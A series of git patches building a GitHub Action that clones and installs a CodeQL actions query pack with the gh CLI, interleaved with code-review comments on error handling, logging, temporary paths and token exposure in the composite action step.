@@ -28716,6 +28716,79 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; +/***/ }), + +/***/ 1772: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.clonePackRepo = exports.runCommandJson = exports.runCommand = exports.newGHConfig = void 0; +const path = __importStar(__nccwpck_require__(1017)); +const core = __importStar(__nccwpck_require__(2186)); +const toolrunner = __importStar(__nccwpck_require__(8159)); +async function newGHConfig() { + return { + path: "", + }; +} +exports.newGHConfig = newGHConfig; +async function runCommand(config, args) { + var bin = path.join(config.path, "gh"); + let output = ""; + var options = { + listeners: { + stdout: (data) => { + output += data.toString(); + }, + }, + }; + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running 
command :: ${bin} ${args.join(" ")}`); + return output.trim(); +} +exports.runCommand = runCommand; +async function runCommandJson(config, args) { + return JSON.parse(await runCommand(config, args)); +} +exports.runCommandJson = runCommandJson; +async function clonePackRepo(gh) { + try { + await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + return true; + } + catch (error) { + core.warning("Failed to clone pack from GitHub..."); + } + return false; +} +exports.clonePackRepo = clonePackRepo; + + /***/ }), /***/ 6144: @@ -28751,12 +28824,17 @@ exports.run = void 0; const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); const cql = __importStar(__nccwpck_require__(950)); +const gh = __importStar(__nccwpck_require__(1772)); /** * The main function for the action. * @returns {Promise} Resolves when the action is complete. */ async function run() { try { + // set up gh + var ghc = await gh.newGHConfig(); + core.debug(`GH CLI found at '${ghc.path}'`); + await gh.runCommand(ghc, ["version"]); // set up codeql var codeql = await cql.newCodeQL(); core.debug(`CodeQL CLI found at '${codeql.path}'`); @@ -28774,10 +28852,13 @@ async function run() { } // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); + //var pack_downloaded = await cql.downloadPack(codeql); + var pack_downloaded = await gh.clonePackRepo(ghc); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + core.info(`Pack path: '${action_path}'`); codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Codeql pack path: '${codeql.path}'`); core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); } else { diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 3826737a082..85d7e33954d 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
@@ -3,7 +3,6 @@ import * as path from "path"; import * as core from "@actions/core"; import * as toolcache from "@actions/tool-cache"; -import * as github from "@actions/github"; import * as toolrunner from "@actions/exec/lib/toolrunner"; export interface CodeQLConfig { diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts new file mode 100644 index 00000000000..4a8fc09ff9c --- /dev/null +++ b/.github/action/src/gh.ts @@ -0,0 +1,54 @@ +import * as fs from "fs"; +import * as path from "path"; + +import * as core from "@actions/core"; +import * as toolcache from "@actions/tool-cache"; +import * as toolrunner from "@actions/exec/lib/toolrunner"; + +export interface GHConfig { + // The path to the codeql bundle. + path: string; +} + +export async function newGHConfig(): Promise { + return { + path: "", + }; +} + +export async function runCommand( + config: GHConfig, + args: string[], +): Promise { + var bin = path.join(config.path, "gh"); + let output = ""; + var options = { + listeners: { + stdout: (data: Buffer) => { + output += data.toString(); + }, + }, + }; + + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); + + return output.trim(); +} + +export async function runCommandJson( + config: GHConfig, + args: string[], +): Promise { + return JSON.parse(await runCommand(config, args)); +} + +export async function clonePackRepo(gh: GHConfig): Promise { + try { + await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + return true; + } catch (error) { + core.warning("Failed to clone pack from GitHub..."); + } + return false; +} diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index b1a4fc80c64..99b9d044d8f 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts 
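Review bot: `clonePackRepo` in the new `gh.ts` clones `GitHubSecurityLab/codeql-actions` at whatever its default branch currently holds, so the queries this action later runs are not tied to a reviewed revision. Git flags can be passed through `gh` to fix the ref, e.g. `["repo", "clone", "GitHubSecurityLab/codeql-actions", "--", "--branch", "<PINNED_TAG>"]` (placeholder tag). The `catch` also drops `error`, which hides whether the failure was authentication, network or an already existing directory; `core.warning("Failed to clone pack from GitHub: " + error);` keeps it. The `fs` and `toolcache` imports are unused in this file, and the comment on `GHConfig.path` still reads "codeql bundle" although `runCommand` joins the field with `gh`.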
@@ -1,6 +1,7 @@ import * as path from "path"; import * as core from "@actions/core"; import * as cql from "./codeql"; +import * as gh from "./gh"; /** * The main function for the action. @@ -8,6 +9,13 @@ import * as cql from "./codeql"; */ export async function run(): Promise { try { + // set up gh + var ghc = await gh.newGHConfig(); + + core.debug(`GH CLI found at '${ghc.path}'`); + + await gh.runCommand(ghc, ["version"]); + // set up codeql var codeql = await cql.newCodeQL(); @@ -30,11 +38,14 @@ export async function run(): Promise { // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); + //var pack_downloaded = await cql.downloadPack(codeql); + var pack_downloaded = await gh.clonePackRepo(ghc); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + core.info(`Pack path: '${action_path}'`); codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Codeql pack path: '${codeql.path}'`); core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); } else { From e2699c31f8dd9871dd62dafa632ad19f246d0ccf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 13:56:58 +0100 Subject: [PATCH 0041/1267] feat(action): clone and install local packs --- .github/action/dist/index.js | 35 ++++++++++++++++++++++++++++++----- .github/action/src/codeql.ts | 21 +++++++++++++++++++++ .github/action/src/gh.ts | 12 ++++++++++-- .github/action/src/index.ts | 5 ++++- 4 files changed, 65 insertions(+), 8 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 9c0a19375f4..eb691f27095 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js 
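Review bot: In the fallback branch of `run()`, the added info line labelled "Codeql pack path" interpolates `codeql.path`, which the earlier debug message in the same function reports as the CodeQL CLI location; the following line already prints `codeql.pack`, so this one should be relabelled `CodeQL CLI path` or removed. The replaced call is kept as a comment (`//var pack_downloaded = await cql.downloadPack(codeql);`) and is better deleted, since the history already records it. `clonePackRepo` is called without a destination here, and nothing visible in the hunk points `codeql.pack` at the clone when it succeeds; the `else` branch lies outside the hunk, so that may be handled there.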
@@ -28596,7 +28596,7 @@ var __importStar = (this && this.__importStar) || function (mod) { return result; }; Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; +exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.installPack = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; const fs = __importStar(__nccwpck_require__(7147)); const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); @@ -28613,10 +28613,15 @@ async function newCodeQL() { }; } exports.newCodeQL = newCodeQL; -async function runCommand(config, args) { +async function runCommand(config, args, cwd) { var bin = path.join(config.path, "codeql"); let output = ""; + var _cwd = process.cwd(); + if (cwd) { + _cwd = cwd; + } var options = { + cwd: cwd, listeners: { stdout: (data) => { output += data.toString(); @@ -28669,6 +28674,19 @@ async function downloadPack(codeql) { return false; } exports.downloadPack = downloadPack; +async function installPack(codeql, path) { + try { + await runCommand(codeql, ["pack", "install"], path); + await runCommand(codeql, ["pack", "install"], path); + return true; + } + catch (error) { + core.warning("Failed to install local packs ..."); + } + core.info("Installed local packs ..."); + return false; +} +exports.installPack = installPack; async function codeqlDatabaseCreate(codeql) { // get runner temp directory for database var temp = process.env["RUNNER_TEMP"]; 
@@ -28776,9 +28794,14 @@ async function runCommandJson(config, args) { return JSON.parse(await runCommand(config, args)); } exports.runCommandJson = runCommandJson; -async function clonePackRepo(gh) { +async function clonePackRepo(gh, path) { try { - await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + await runCommand(gh, [ + "repo", + "clone", + "GitHubSecurityLab/codeql-actions", + path, + ]); return true; } catch (error) { @@ -28853,7 +28876,9 @@ async function run() { // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); //var pack_downloaded = await cql.downloadPack(codeql); - var pack_downloaded = await gh.clonePackRepo(ghc); + let pack_path = "/tmp/codeql-actions"; + var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); + await cql.installPack(codeql, pack_path); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); core.info(`Pack path: '${action_path}'`); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 85d7e33954d..906e7876f66 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -34,10 +34,16 @@ export async function newCodeQL(): Promise { export async function runCommand( config: CodeQLConfig, args: string[], + cwd?: string, ): Promise { var bin = path.join(config.path, "codeql"); let output = ""; + var _cwd: string = process.cwd(); + if (cwd) { + _cwd = cwd; + } var options = { + cwd: cwd, listeners: { stdout: (data: Buffer) => { output += data.toString(); 
@@ -99,6 +105,21 @@ export async function downloadPack(codeql: CodeQLConfig): Promise { return false; } +export async function installPack( + codeql: CodeQLConfig, + path: string, +): Promise { + try { + await runCommand(codeql, ["pack", "install"], path); + await runCommand(codeql, ["pack", "install"], path); + return true; + } catch (error) { + core.warning("Failed to install local packs ..."); + } + core.info("Installed local packs ..."); + return false; +} + export async function codeqlDatabaseCreate( codeql: CodeQLConfig, ): Promise { diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts index 4a8fc09ff9c..a80f4b4f59c 100644 --- a/.github/action/src/gh.ts +++ b/.github/action/src/gh.ts @@ -43,9 +43,17 @@ export async function runCommandJson( return JSON.parse(await runCommand(config, args)); } -export async function clonePackRepo(gh: GHConfig): Promise { +export async function clonePackRepo( + gh: GHConfig, + path: string, +): Promise { try { - await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + await runCommand(gh, [ + "repo", + "clone", + "GitHubSecurityLab/codeql-actions", + path, + ]); return true; } catch (error) { core.warning("Failed to clone pack from GitHub..."); diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index 99b9d044d8f..24daf06f537 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -39,7 +39,10 @@ export async function run(): Promise { // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); //var pack_downloaded = await cql.downloadPack(codeql); - var pack_downloaded = await gh.clonePackRepo(ghc); + + let pack_path = "/tmp/codeql-actions"; + var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); + await cql.installPack(codeql, pack_path); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); From c58c4e0d54c19514f172ed1787624c44b9888fbd Mon Sep 17 00:00:00 2001 
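Review bot: `core.info("Installed local packs ...")` in `installPack` sits after the try/catch, so it is reached only once the failure warning has been logged and never on success, where the function has already returned. Move it inside the `try` just before `return true;`, and keep the cause in the warning: `core.warning("Failed to install local packs: " + error);`. The two `runCommand(codeql, ["pack", "install"], path)` calls are identical, which looks like a copy-paste slip if two different pack directories were intended. The parameter named `path` also shadows the `path` module imported at the top of `codeql.ts`; `dir` would avoid that.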
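Review bot: `cql.installPack(codeql, pack_path)` runs before `pack_downloaded` is checked, and `pack_path` is the fixed location `/tmp/codeql-actions`, so when the clone fails (for instance because the directory is left over on a reused runner) `codeql pack install` still runs on whatever that directory holds. Install only after a successful clone: `if (pack_downloaded) { await cql.installPack(codeql, pack_path); }`. For the location, prefer the runner temp directory that `codeqlDatabaseCreate` already reads: `let pack_path = path.join(process.env["RUNNER_TEMP"] || "/tmp", "codeql-actions");`. `run()` starts and ends outside this hunk.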
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:06:46 +0100 Subject: [PATCH 0042/1267] feat(actions): refactor as composite action to be able to pass env vars --- .github/action/dist/index.js | 4 ++-- .github/action/src/codeql.ts | 1 - .github/action/src/gh.ts | 2 +- action.yml | 15 +++++++++++++-- 4 files changed, 16 insertions(+), 6 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index eb691f27095..49c02951414 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28678,12 +28678,12 @@ async function installPack(codeql, path) { try { await runCommand(codeql, ["pack", "install"], path); await runCommand(codeql, ["pack", "install"], path); + core.info("Installed local packs ..."); return true; } catch (error) { core.warning("Failed to install local packs ..."); } - core.info("Installed local packs ..."); return false; } exports.installPack = installPack; @@ -30815,4 +30815,4 @@ module.exports = parseParams /******/ module.exports = __webpack_exports__; /******/ /******/ })() -; \ No newline at end of file +; diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 906e7876f66..38c222cb2a5 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -116,7 +116,6 @@ export async function installPack( } catch (error) { core.warning("Failed to install local packs ..."); } - core.info("Installed local packs ..."); return false; } diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts index a80f4b4f59c..a4e187053be 100644 --- a/.github/action/src/gh.ts +++ b/.github/action/src/gh.ts @@ -12,7 +12,7 @@ export interface GHConfig { export async function newGHConfig(): Promise { return { - path: "", + path: "/usr/bin/", }; } diff --git a/action.yml b/action.yml index 03054c195be..976e35d8f7c 100644 --- a/action.yml +++ b/action.yml 
@@ -14,6 +14,17 @@ inputs: description: "SARIF File Output" default: "codeql-actions.sarif" +# runs: +# using: "node16" +# main: ".github/action/dist/index.js" + runs: - using: "node16" - main: ".github/action/dist/index.js" + using: 'composite' + steps: + - name: Do something with context + shell: bash + env: + GH_TOKEN: ${{ github.token }} + run: | + node .github/action/dist/index.js + node ${{ github.action_path }}/.github/action/dist/index.js From e9f30062046c6adbfe8b72ccc6b4b9ad95ac3729 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:10:52 +0100 Subject: [PATCH 0043/1267] fix(actions): pass the qlpack dirs --- .github/action/src/codeql.ts | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 38c222cb2a5..1f604f9c89a 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -107,11 +107,11 @@ export async function downloadPack(codeql: CodeQLConfig): Promise { export async function installPack( codeql: CodeQLConfig, - path: string, + dir: string, ): Promise { try { - await runCommand(codeql, ["pack", "install"], path); - await runCommand(codeql, ["pack", "install"], path); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { core.warning("Failed to install local packs ..."); From a94793fc0996065c3deb0fccf3534c684c45c333 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:14:53 +0100 Subject: [PATCH 0044/1267] fix(actions): pass the qlpack dirs --- .github/action/src/codeql.ts | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 1f604f9c89a..7cb1dab48e5 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
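Review bot: The first line of the `run:` script, `node .github/action/dist/index.js`, resolves against the job's working directory, which for a consumer of this action is normally their own checkout rather than this action's files, and the step carries `GH_TOKEN` in its environment. On a pull-request run that checkout can contain contributor-supplied content, so a file at that path would execute with the token available. Keep only the action-relative invocation and read the path from the environment instead of expanding the expression into the script: `node "$GITHUB_ACTION_PATH/.github/action/dist/index.js"`. The step name `Do something with context` is a placeholder, and the previous `runs:` block is better deleted than left commented out.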
@@ -34,14 +34,15 @@ export async function newCodeQL(): Promise { export async function runCommand( config: CodeQLConfig, args: string[], - cwd?: string, + cwd_arg?: string, ): Promise { var bin = path.join(config.path, "codeql"); let output = ""; - var _cwd: string = process.cwd(); - if (cwd) { - _cwd = cwd; + var cwd: string = process.cwd(); + if (cwd_arg) { + cwd = cwd_arg; } + core.info("Current working directory: " + cwd); var options = { cwd: cwd, listeners: { From 04a2ae9ad34bd3b1bf12b84e596f53bf186326b1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:29:03 +0100 Subject: [PATCH 0045/1267] fix(actions): ql pack installation --- .github/action/src/gh.ts | 3 --- .github/action/src/index.ts | 31 ++++++++++++++++++------------- 2 files changed, 18 insertions(+), 16 deletions(-) diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts index a4e187053be..668e559e40b 100644 --- a/.github/action/src/gh.ts +++ b/.github/action/src/gh.ts @@ -1,8 +1,5 @@ -import * as fs from "fs"; import * as path from "path"; - import * as core from "@actions/core"; -import * as toolcache from "@actions/tool-cache"; import * as toolrunner from "@actions/exec/lib/toolrunner"; export interface GHConfig { diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index 24daf06f537..aea847298b4 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts 
@@ -37,24 +37,29 @@ export async function run(): Promise { } // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - //var pack_downloaded = await cql.downloadPack(codeql); + // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + // var pack_downloaded = await cql.downloadPack(codeql); + core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; - var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); - await cql.installPack(codeql, pack_path); + var pack_cloned = await gh.clonePackRepo(ghc, pack_path); + core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - core.info(`Pack path: '${action_path}'`); - codeql.pack = path.join(action_path, "ql", "src"); - core.info(`Codeql pack path: '${codeql.path}'`); - - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } else { - core.info(`Pack downloaded '${codeql.pack}'`); + if (pack_cloned === false) { + throw new Error("Could not clone the actions ql pack"); } + core.info(`Installing CodeQL Actions packs from '${pack_path}'`); + var pack_installed = await cql.installPack(codeql, pack_path); + + if (pack_installed === false) { + throw new Error("Could not install the actions ql packs"); + } + + core.info(`Pack path: '${pack_path}'`); + codeql.pack = path.join(pack_path, "ql", "src"); + core.info(`Codeql Queries pack path: '${codeql.pack}'`); + core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); From b11d8dad4905269e6023ae20cfbac501638ef755 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:31:07 +0100 Subject: [PATCH 0046/1267] fix(actions): ql pack installation --- .github/action/dist/index.js | 46 +++++++++++++++++++----------------- 1 file changed, 24 insertions(+), 22 deletions(-) 
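Review bot: Both new progress messages can mislead: the "Cloning CodeQL Actions pack into" line interpolates `codeql.pack` although the clone destination is `pack_path`, and the "Cloned CodeQL Actions pack into" line is logged before `pack_cloned` is checked, so it appears even when the clone failed. Log `pack_path` in the first message and move the second below the `if (pack_cloned === false)` guard. `pack_path` is still the fixed `/tmp/codeql-actions`; a directory under `process.env["RUNNER_TEMP"]`, which `codeqlDatabaseCreate` already uses, would presumably avoid picking up leftovers from an earlier job on a reused runner. `run()` starts and ends outside this hunk.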
diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 49c02951414..3d69e1f81ce 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28613,13 +28613,14 @@ async function newCodeQL() { }; } exports.newCodeQL = newCodeQL; -async function runCommand(config, args, cwd) { +async function runCommand(config, args, cwd_arg) { var bin = path.join(config.path, "codeql"); let output = ""; - var _cwd = process.cwd(); - if (cwd) { - _cwd = cwd; + var cwd = process.cwd(); + if (cwd_arg) { + cwd = cwd_arg; } + core.info("Current working directory: " + cwd); var options = { cwd: cwd, listeners: { @@ -28674,11 +28675,10 @@ async function downloadPack(codeql) { return false; } exports.downloadPack = downloadPack; -async function installPack(codeql, path) { +async function installPack(codeql, dir) { try { - await runCommand(codeql, ["pack", "install"], path); - await runCommand(codeql, ["pack", "install"], path); - core.info("Installed local packs ..."); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { @@ -28771,7 +28771,7 @@ const core = __importStar(__nccwpck_require__(2186)); const toolrunner = __importStar(__nccwpck_require__(8159)); async function newGHConfig() { return { - path: "", + path: "/usr/bin/", }; } exports.newGHConfig = newGHConfig; 
@@ -28874,21 +28874,23 @@ async function run() { throw new Error("CodeQL Yaml extractor not installed"); } // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - //var pack_downloaded = await cql.downloadPack(codeql); + // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + // var pack_downloaded = await cql.downloadPack(codeql); + core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; - var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); - await cql.installPack(codeql, pack_path); - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - core.info(`Pack path: '${action_path}'`); - codeql.pack = path.join(action_path, "ql", "src"); - core.info(`Codeql pack path: '${codeql.path}'`); - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + var pack_cloned = await gh.clonePackRepo(ghc, pack_path); + core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); + if (pack_cloned === false) { + throw new Error("Could not clone the actions ql pack"); } - else { - core.info(`Pack downloaded '${codeql.pack}'`); + core.info(`Installing CodeQL Actions packs from '${pack_path}'`); + var pack_installed = await cql.installPack(codeql, pack_path); + if (pack_installed === false) { + throw new Error("Could not install the actions ql packs"); } + core.info(`Pack path: '${pack_path}'`); + codeql.pack = path.join(pack_path, "ql", "src"); + core.info(`Codeql Queries pack path: '${codeql.pack}'`); core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); core.info("Running CodeQL analysis..."); @@ -30815,4 +30817,4 @@ module.exports = parseParams /******/ module.exports = __webpack_exports__; /******/ /******/ })() -; +; \ No newline at end of file From 41639dd0e2707f39c2084a5b1c5d1914161dd401 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:37:43 +0100 Subject: [PATCH 0047/1267] fix(actions): ql pack installation --- .github/action/dist/index.js | 3 --- .github/action/src/index.ts | 4 ---- 2 files changed, 7 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 3d69e1f81ce..c482d87b4f2 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28873,9 +28873,6 @@ async function run() { core.setFailed("CodeQL Yaml extractor not installed"); throw new Error("CodeQL Yaml extractor not installed"); } - // download pack - // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - // var pack_downloaded = await cql.downloadPack(codeql); core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; var pack_cloned = await gh.clonePackRepo(ghc, pack_path); diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index aea847298b4..717782b555c 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -36,10 +36,6 @@ export async function run(): Promise { throw new Error("CodeQL Yaml extractor not installed"); } - // download pack - // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - // var pack_downloaded = await cql.downloadPack(codeql); - core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; var pack_cloned = await gh.clonePackRepo(ghc, pack_path); From b3bab160d2a0e0a07dfdbe757d15cb5de8c19666 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:41:21 +0100 Subject: [PATCH 0048/1267] fix(actions): ql pack installation --- .github/action/src/codeql.ts | 2 ++ action.yml | 1 - 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 7cb1dab48e5..b999b698d14 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
@@ -111,7 +111,9 @@ export async function installPack( dir: string, ): Promise { try { + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { diff --git a/action.yml b/action.yml index 976e35d8f7c..ed6eb327a9e 100644 --- a/action.yml +++ b/action.yml @@ -26,5 +26,4 @@ runs: env: GH_TOKEN: ${{ github.token }} run: | - node .github/action/dist/index.js node ${{ github.action_path }}/.github/action/dist/index.js From 13c5ec07b45eb0eb4a7791df5ead19ee4e48aa94 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:41:47 +0100 Subject: [PATCH 0049/1267] fix(actions): ql pack installation --- .github/action/dist/index.js | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index c482d87b4f2..b2e5a97f67f 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28677,7 +28677,9 @@ async function downloadPack(codeql) { exports.downloadPack = downloadPack; async function installPack(codeql, dir) { try { + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } From 003b8cc8c0f127ee8903484217318fc8d80cdd86 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:44:47 +0100 Subject: [PATCH 0050/1267] fix(actions): ql pack installation --- .github/action/dist/index.js | 4 ++-- .github/action/src/codeql.ts | 12 ++++++++++-- 2 files changed, 12 insertions(+), 4 deletions(-) 
diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index b2e5a97f67f..a778f7d0620 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28677,9 +28677,9 @@ async function downloadPack(codeql) { exports.downloadPack = downloadPack; async function installPack(codeql, dir) { try { - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-all"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); + await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-queries"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index b999b698d14..790eff6eadc 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -111,9 +111,17 @@ export async function installPack( dir: string, ): Promise { try { - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); + await runCommand( + codeql, + ["pack", "download", "githubsecuritylab/actions-all"], + path.join(dir, "/ql/lib"), + ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); + await runCommand( + codeql, + ["pack", "download", "githubsecuritylab/actions-queries"], + path.join(dir, "/ql/src"), + ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { From 8e59fb7558e985661fafe122627e12ba1f16e84c Mon Sep 17 00:00:00 2001 
